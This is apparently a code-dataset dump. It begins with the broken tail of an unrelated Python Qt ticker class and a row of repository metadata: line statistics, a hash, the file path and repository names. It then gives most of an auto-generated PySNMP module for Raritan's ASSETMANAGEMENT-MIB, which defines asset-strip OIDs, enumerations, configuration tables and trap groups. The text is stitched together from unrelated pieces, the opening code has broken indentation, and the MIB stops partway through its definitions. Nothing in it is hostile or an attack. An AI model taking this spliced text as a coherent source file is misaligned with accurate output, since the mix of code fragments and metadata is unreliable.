super(MyModel, self).setFaultFlag(False)
super(MyModel, self).setLastUpdatedNow()
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
            print(''.join('!! ' + line for line in lines))
super(MyModel, self).setFaultFlag(True)
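# Usage sketch (illustrative, not part of the original module): `getbidobj` and
# `getaskobj` are assumed to expose getBid()/getAsk() as used above; the names
# below are hypothetical.
#   app = QtGui.QApplication(sys.argv)
#   ticker = MyTicker(None, bid_source, ask_source)
#   ticker.show()
#   sys.exit(app.exec_())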
| 28.793103
| 76
| 0.64511
| 2,303
| 0.919361
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.070659
|
8bdfada5a195abb5fa1a5addc5ae23054f34a07f
| 62,005
|
py
|
Python
|
pysnmp-with-texts/ASSETMANAGEMENT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/ASSETMANAGEMENT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/ASSETMANAGEMENT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module ASSETMANAGEMENT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASSETMANAGEMENT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:29:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
InetPortNumber, InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetPortNumber", "InetAddress", "InetAddressType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
sysName, sysLocation, sysContact = mibBuilder.importSymbols("SNMPv2-MIB", "sysName", "sysLocation", "sysContact")
NotificationType, Gauge32, ModuleIdentity, MibIdentifier, Integer32, Counter64, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter32, Unsigned32, enterprises, ObjectIdentity, TimeTicks, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Gauge32", "ModuleIdentity", "MibIdentifier", "Integer32", "Counter64", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter32", "Unsigned32", "enterprises", "ObjectIdentity", "TimeTicks", "Bits")
DisplayString, TruthValue, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TextualConvention")
raritan = ModuleIdentity((1, 3, 6, 1, 4, 1, 13742))
raritan.setRevisions(('2015-01-05 00:00', '2014-09-25 00:00', '2014-04-04 00:00', '2012-03-29 00:00', '2012-03-26 00:00', '2012-02-14 00:00', '2012-02-10 00:00', '2012-02-08 00:00', '2012-02-07 00:00', '2012-02-03 00:00', '2012-01-17 00:00', '2012-01-04 00:00', '2011-12-08 00:00', '2011-11-11 00:00', '2011-11-09 00:00', '2011-10-25 00:00', '2011-10-05 00:00', '2011-09-05 00:00', '2011-09-01 00:00', '2011-08-23 00:00', '2011-05-18 00:00', '2011-05-04 00:00', '2011-04-15 00:00', '2011-02-18 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: raritan.setRevisionsDescriptions(('The following changes were made. 1) Added agentInetPortNumber under trapInformation 2) Added agentInetPortNumber as a varbind to all traps ', 'The following changes were made. 1) added assetStripCascadePosition to the assetManagement table 2) added rackUnitRelativePosition to the assetManagement table. 3) added assetStripNumberOfRackUnits to the assetManagement table. 4) added assetStripType, assetStripCascadePosition, rackUnitRelativePosition, assetStripNumberOfRackUnits to the following traps. assetTagConnected assetTagDisconnected bladeExtensionConnected bladeExtensionDisconnected ', 'The following changes were made. 1) added bladeTagID to assetTagConnected and assetTagDisconnected traps 2) added rackUnitCount to the following traps. assetTagConnected assetTagDisconnected bladeExtensionConnected bladeExtensionDisconnected assetStripStateChange ', 'The following changes were made. 1) add logParentBladeID to AssetManagementLogEntryStruct ', 'The following changes were made. 1) clarify documentation of LED operation mode: setting ledMode, ledColor or ledColorStr automatically switches the ledOperationMode to manual. ', 'The following changes were made. 1) add logAssetStripState and extend logEventType with assetStripStateChange ', 'The following changes were made. 1) clarify documentation regarding logSlotNumber: it is 0 a) indicating a tag on the main strip b) in case no strip is connected or the value is not valid for a certain log entry ', 'The following changes were made. 1) added bladeExtensionSize to bladeExtensionConnected and bladeExtensionDisconnected traps ', 'The following changes were made. 1) added logSize, oldestLogID, newestLogID and logEventCount 2) added assetManagementLogTable and assetManagementLogEntry ', ' 1) Added assetStripDefaultLEDColorConnected, assetStripDefaultLEDColorConnectedStr, assetStripDefaultLEDColorDisconnected, assetStripDefaultLEDColorDisconnectedStr to AssetStripConfigurationEntryStruct 2) Deprecated defaultLEDColorConnected, defaultLEDColorConnectedStr, defaultLEDColorDisconnected, defaultLEDColorDisconnectedStr ', '1) add rackUnitPosition to the following traps: assetTagConnected, assetTagDisconnected, bladeExtensionConnected, bladeExtensionDisconnected, rackUnitConfigurationChanged 2) rackUnitNumber in the traps now always corresponds with rackUnitID, clarify documentation accordingly ', ' 1) extended AssetStripConfigurationEntryStruct by assetStripType and numberOfComponentAssetStrips 2) added compositeAssetStripCompositionChanged trap ', ' 1) removed bladeSlotNumberingMode from AssetManagementEntryStruct 2) removed BladeSlotNumberingModeEnumeration 3) removed bladeSlotNumberingMode from the rackUnitConfigurationChanged trap ', 'The following changes were made. 1) allow 0 in rackUnitPosition in case there is no strip connected 2) added none (nothing connected) and unknown (strip disconnected) to rackUnitType ', 'The following changes were made. 1) allow a 0 in bladeExtensionSize in case there is no blade extension connected or the asset strip is disconnected. ', 'The following changes were made. 1) added sysContact,sysName, sysLocation to all traps 2) added currentMainTagCount, currentBladeTagCount 3) added maxMainTagCount, maxBladeTagCount 4) added bladeExtensionOverflow 5) added traps bladeExtensionOverflowOccured, bladeExtensionOverflowCleared ', 'The following changes were made. 1) Added assetStripName to all traps ', '1) added rackUnitName ', ' 1) added bladeExtensionConnected, bladeExtensionDisconnected traps 2) in AssetManagementEntryStruct renamed rackUnitSize to bladeExtensionSize 3) added bladeSlotPosition to BladeExtensionEntryStruct 4) added bladeSlotNumberingMode to AssetManagementEntryStruct 5) added BladeSlotNumberingModeEnumeration 6) added bladeSlotNumberingMode to the rackUnitConfigurationChanged trap ', 'Support blade server extension segments: 1) added rackUnitType, rackUnitSize 2) added bladeExtensionTable and bladeExtensionEntry 3) added slotNumber to assetTagConnected and assetTagDisconnected traps ', 'The following changes were made. 1) Modified blinking speeds in AssetManagementLEDModeEnumeration to fastBlink, slowBlink ', 'The following changes were made. 1) Added ledOperationMode to the Tag Connected and Tag Disconnected Traps. 2) Modified the DESCRIPTION of rackUnitNumberingOffset. 3) Modified blinking speeds in AssetManagementLEDModeEnumeration to blinkFastest, blink2ndFastest ', 'The following changes were made. 1) Added DeviceConfigurationParameterEnumeration, RackUnitNumberingModeEnumeration, AssetStripOrientationEnumeration 2) Added deviceConfigurationChanged Trap 3) Added deviceUserName, deviceChangedParameter, changedParameterNewValue to trapInformationGroup 4) Added blinking2(4) to AssetManagementLEDModeEnumeration 5) Add led mode and led color information to the Tag Connected and Tag Disconnected Traps. 6) Added rackUnitNumberingMode, rackUnitNumberingOffset, assetStripOrientation to AssetStripConfigurationEntryStruct 7) Added rackUnitPosition to AssetManagementEntryStruct 8) Added rackUnitConfigurationChanged Trap ', 'The first version of the MIB.',))
if mibBuilder.loadTexts: raritan.setLastUpdated('201501050000Z')
if mibBuilder.loadTexts: raritan.setOrganization('Raritan')
if mibBuilder.loadTexts: raritan.setContactInfo(' Author: Raritan Americas, Inc. postal: Raritan Americas, Inc. 400 Cottontail Lane Somerset, NJ 08873 email: tech@raritan.com phone: +1 732 764 8886 ')
if mibBuilder.loadTexts: raritan.setDescription('This MIB describes the SNMP functions of the asset management capable products from Raritan Computer.')
assetManager = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7))
traps = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 0))
trapInformation = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0))
configuration = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 1))
conformance = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 2))
log = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 3))
assetStrip = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6))
assetManagement = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7))
compliances = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 2, 1))
groups = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2))
complianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 13742, 7, 2, 1, 1)).setObjects(("ASSETMANAGEMENT-MIB", "configGroup"), ("ASSETMANAGEMENT-MIB", "assetManagementGroup"), ("ASSETMANAGEMENT-MIB", "trapInformationGroup"), ("ASSETMANAGEMENT-MIB", "trapsGroup"), ("ASSETMANAGEMENT-MIB", "logGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
complianceRev1 = complianceRev1.setStatus('deprecated')
if mibBuilder.loadTexts: complianceRev1.setDescription('The requirements for conformance to the ASSETMANAGEMENT-MIB. This is deprecated in favor of complianceRev2')
complianceRev2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 13742, 7, 2, 1, 2)).setObjects(("ASSETMANAGEMENT-MIB", "configGroup2"), ("ASSETMANAGEMENT-MIB", "assetManagementGroup"), ("ASSETMANAGEMENT-MIB", "trapInformationGroup"), ("ASSETMANAGEMENT-MIB", "trapsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
complianceRev2 = complianceRev2.setStatus('current')
if mibBuilder.loadTexts: complianceRev2.setDescription('The requirements for conformance to the ASSETMANAGEMENT-MIB.')
configGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 1)).setObjects(("ASSETMANAGEMENT-MIB", "defaultLEDColorConnected"), ("ASSETMANAGEMENT-MIB", "defaultLEDColorConnectedStr"), ("ASSETMANAGEMENT-MIB", "defaultLEDColorDisconnected"), ("ASSETMANAGEMENT-MIB", "defaultLEDColorDisconnectedStr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
configGroup = configGroup.setStatus('deprecated')
if mibBuilder.loadTexts: configGroup.setDescription('A collection of objects representing configuration data. ')
configGroup2 = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 5)).setObjects(("ASSETMANAGEMENT-MIB", "assetStripCount"), ("ASSETMANAGEMENT-MIB", "assetStripState"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "rackUnitNumberingMode"), ("ASSETMANAGEMENT-MIB", "rackUnitNumberingOffset"), ("ASSETMANAGEMENT-MIB", "assetStripOrientation"), ("ASSETMANAGEMENT-MIB", "currentMainTagCount"), ("ASSETMANAGEMENT-MIB", "currentBladeTagCount"), ("ASSETMANAGEMENT-MIB", "maxMainTagCount"), ("ASSETMANAGEMENT-MIB", "maxBladeTagCount"), ("ASSETMANAGEMENT-MIB", "bladeExtensionOverflow"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "numberOfComponentAssetStrips"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorConnected"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorConnectedStr"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorDisconnected"), ("ASSETMANAGEMENT-MIB", "assetStripDefaultLEDColorDisconnectedStr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
configGroup2 = configGroup2.setStatus('current')
if mibBuilder.loadTexts: configGroup2.setDescription('A collection of objects representing configuration data.')
assetManagementGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 2)).setObjects(("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledColorStr"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeTagID"), ("ASSETMANAGEMENT-MIB", "tagFamily"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitType"), ("ASSETMANAGEMENT-MIB", "bladeExtensionSize"), ("ASSETMANAGEMENT-MIB", "bladeSlotPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
assetManagementGroup = assetManagementGroup.setStatus('current')
if mibBuilder.loadTexts: assetManagementGroup.setDescription('A collection of objects providing the ability to control the asset management strip.')
trapsGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 3)).setObjects(("ASSETMANAGEMENT-MIB", "assetStripStateChange"), ("ASSETMANAGEMENT-MIB", "assetTagConnected"), ("ASSETMANAGEMENT-MIB", "assetTagDisconnected"), ("ASSETMANAGEMENT-MIB", "assetStripFirmwareUpdate"), ("ASSETMANAGEMENT-MIB", "deviceConfigurationChanged"), ("ASSETMANAGEMENT-MIB", "rackUnitConfigurationChanged"), ("ASSETMANAGEMENT-MIB", "bladeExtensionConnected"), ("ASSETMANAGEMENT-MIB", "bladeExtensionDisconnected"), ("ASSETMANAGEMENT-MIB", "bladeExtensionOverflowOccured"), ("ASSETMANAGEMENT-MIB", "bladeExtensionOverflowCleared"), ("ASSETMANAGEMENT-MIB", "compositeAssetStripCompositionChanged"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
trapsGroup = trapsGroup.setStatus('current')
if mibBuilder.loadTexts: trapsGroup.setDescription('A collection of traps.')
trapInformationGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 4)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "slotNumber"), ("ASSETMANAGEMENT-MIB", "assetStripFirmwareUpdateState"), ("ASSETMANAGEMENT-MIB", "deviceUserName"), ("ASSETMANAGEMENT-MIB", "deviceChangedParameter"), ("ASSETMANAGEMENT-MIB", "changedParameterNewValue"), ("ASSETMANAGEMENT-MIB", "oldNumberOfComponentAssetStrips"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
trapInformationGroup = trapInformationGroup.setStatus('current')
if mibBuilder.loadTexts: trapInformationGroup.setDescription('A collection of objects providing information in the traps.')
logGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 13742, 7, 2, 2, 6)).setObjects(("ASSETMANAGEMENT-MIB", "logSize"), ("ASSETMANAGEMENT-MIB", "oldestLogID"), ("ASSETMANAGEMENT-MIB", "newestLogID"), ("ASSETMANAGEMENT-MIB", "logEventCount"), ("ASSETMANAGEMENT-MIB", "logTimeStamp"), ("ASSETMANAGEMENT-MIB", "logEventType"), ("ASSETMANAGEMENT-MIB", "logAssetStripNumber"), ("ASSETMANAGEMENT-MIB", "logRackUnitNumber"), ("ASSETMANAGEMENT-MIB", "logRackUnitPosition"), ("ASSETMANAGEMENT-MIB", "logSlotNumber"), ("ASSETMANAGEMENT-MIB", "logTagID"), ("ASSETMANAGEMENT-MIB", "logAssetStripState"), ("ASSETMANAGEMENT-MIB", "logParentBladeID"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
logGroup = logGroup.setStatus('current')
if mibBuilder.loadTexts: logGroup.setDescription('A collection of objects representing log data.')
class AssetManagementLEDModeEnumeration(TextualConvention, Integer32):
description = 'The mode of an LED for the asset manager.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("on", 1), ("off", 2), ("fastBlink", 3), ("slowBlink", 4))
class AssetManagementLEDOperationModeEnumeration(TextualConvention, Integer32):
description = 'The operation mode of an LED for the asset manager.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("manual", 1), ("automatic", 2))
class AssetStripStateEnumeration(TextualConvention, Integer32):
description = 'The state of an asset strip.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("disconnected", 1), ("firmwareUpdate", 2), ("unsupported", 3), ("available", 4))
class AssetStripFirmwareUpdateStateEnumeration(TextualConvention, Integer32):
description = 'The state of an asset strip firmware update.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("started", 1), ("successful", 2), ("failed", 3))
class RackUnitTypeEnumeration(TextualConvention, Integer32):
description = 'Type of an asset tag.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 30, 31))
namedValues = NamedValues(("single", 1), ("blade", 2), ("none", 30), ("unknown", 31))
class RGBCOLOR(TextualConvention, OctetString):
description = 'An RGB color value.'
status = 'current'
displayHint = '1d;'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 3)
fixedLength = 3
class RackUnitNumberingModeEnumeration(TextualConvention, Integer32):
description = 'The configurable parameters.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("topDown", 0), ("bottomUp", 1))
class AssetStripOrientationEnumeration(TextualConvention, Integer32):
description = 'The configurable parameters.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("topConnector", 0), ("bottomConnector", 1))
class DeviceConfigurationParameterEnumeration(TextualConvention, Integer32):
description = 'The configurable parameters.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("defaultLEDColorConnected", 0), ("defaultLEDColorDisconnected", 1), ("rackUnitCount", 2), ("assetStripName", 3), ("assetStripRackUnitNumberingMode", 4), ("assetStripRackUnitNumberingOffset", 5), ("assetStripOrientation", 6))
class AssetStripTypeEnumeration(TextualConvention, Integer32):
description = 'The asset strip types.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("simple", 0), ("composite", 1))
class LogEventTypeEnumeration(TextualConvention, Integer32):
description = 'The type of a log event.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
namedValues = NamedValues(("empty", 0), ("assetTagConnected", 1), ("assetTagDisconnected", 2), ("assetStripStateChange", 3))
assetStripCount = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripCount.setStatus('current')
if mibBuilder.loadTexts: assetStripCount.setDescription('The number of asset management strip units supported.')
defaultLEDColorConnected = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 2), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorConnected.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorConnected.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; in binary format. This is deprecated in favor of assetStripDefaultLEDColorConnected For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
defaultLEDColorConnectedStr = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorConnectedStr.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorConnectedStr.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; string with 3 hex octets This is deprecated in favor of assetStripDefaultLEDColorConnectedStr For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
defaultLEDColorDisconnected = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 4), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorDisconnected.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorDisconnected.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; in binary format. This is deprecated in favor of assetStripDefaultLEDColorDisconnected For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
defaultLEDColorDisconnectedStr = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorDisconnectedStr.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorDisconnectedStr.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; string with 3 hex octets This is deprecated in favor of assetStripDefaultLEDColorDisconnectedStr For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
assetStripConfigurationTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1), )
if mibBuilder.loadTexts: assetStripConfigurationTable.setStatus('current')
if mibBuilder.loadTexts: assetStripConfigurationTable.setDescription('A list of configuration entries. The number of entries is given by the value of assetStripCount.')
assetStripConfigurationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "assetStripID"))
if mibBuilder.loadTexts: assetStripConfigurationEntry.setStatus('current')
if mibBuilder.loadTexts: assetStripConfigurationEntry.setDescription('An entry containing configuration objects for a particular asset management strip unit.')
assetStripID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256)))
if mibBuilder.loadTexts: assetStripID.setStatus('current')
if mibBuilder.loadTexts: assetStripID.setDescription('A unique value for each asset strip. Its value ranges between 1 and the value of assetStripCount.')
rackUnitCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(8, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitCount.setStatus('current')
if mibBuilder.loadTexts: rackUnitCount.setDescription('The number of rack-units for the asset management.')
assetStripState = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 3), AssetStripStateEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripState.setStatus('current')
if mibBuilder.loadTexts: assetStripState.setDescription('Asset management strip state.')
assetStripName = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripName.setStatus('current')
if mibBuilder.loadTexts: assetStripName.setDescription('Asset management strip name.')
rackUnitNumberingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 5), RackUnitNumberingModeEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitNumberingMode.setStatus('current')
if mibBuilder.loadTexts: rackUnitNumberingMode.setDescription('The rack unit numbering mode for this asset strip.')
rackUnitNumberingOffset = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 6), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitNumberingOffset.setStatus('current')
if mibBuilder.loadTexts: rackUnitNumberingOffset.setDescription('The offset (starting value) for rack Unit Numbering; This takes care of the case in which the asset strip is monitoring not all the assets but a subset of it, starting from racknumberingOffset. For example, the asset strip may be monitoring assets from 10 through 26; default value is 1 ')
assetStripOrientation = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 7), AssetStripOrientationEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripOrientation.setStatus('current')
if mibBuilder.loadTexts: assetStripOrientation.setDescription('Is the asset strip oriented such that the connector is at the top or the bottom? If the asset strip has a tilt sensor, then this variable is read-only and an attempt to set (write) it will result in an error. If the asset strip does not have a tilt sensor, then this variable is read-write ')
currentMainTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentMainTagCount.setStatus('current')
if mibBuilder.loadTexts: currentMainTagCount.setDescription('Number of tags currently connected to the main strip.')
currentBladeTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentBladeTagCount.setStatus('current')
if mibBuilder.loadTexts: currentBladeTagCount.setDescription('Number of tags currently connected to blade extensions. This may be larger than the maxBladeTagCount. In this case an overflow occurred and all tags over maxBladeTagCount are not recognized.')
maxMainTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: maxMainTagCount.setStatus('current')
if mibBuilder.loadTexts: maxMainTagCount.setDescription('Maximum number of tags on the main asset strip.')
maxBladeTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: maxBladeTagCount.setStatus('current')
if mibBuilder.loadTexts: maxBladeTagCount.setDescription('Maximum number of blade tags supported.')
bladeExtensionOverflow = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeExtensionOverflow.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionOverflow.setDescription("Set if the maximum number of supported tags on blade extensions is reached. When this flag is set, new tags on blade extensions won't be discovered anymore until other tags on blade extensions are removed.")
assetStripType = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 13), AssetStripTypeEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripType.setStatus('current')
if mibBuilder.loadTexts: assetStripType.setDescription('The asset strip type.')
numberOfComponentAssetStrips = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: numberOfComponentAssetStrips.setStatus('current')
if mibBuilder.loadTexts: numberOfComponentAssetStrips.setDescription('The number of components building a composite asset strip.')
assetStripDefaultLEDColorConnected = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 15), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnected.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnected.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; in binary format.')
assetStripDefaultLEDColorConnectedStr = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 16), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnectedStr.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnectedStr.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; string with 3 hex octets')
assetStripDefaultLEDColorDisconnected = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 17), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnected.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnected.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; in binary format.')
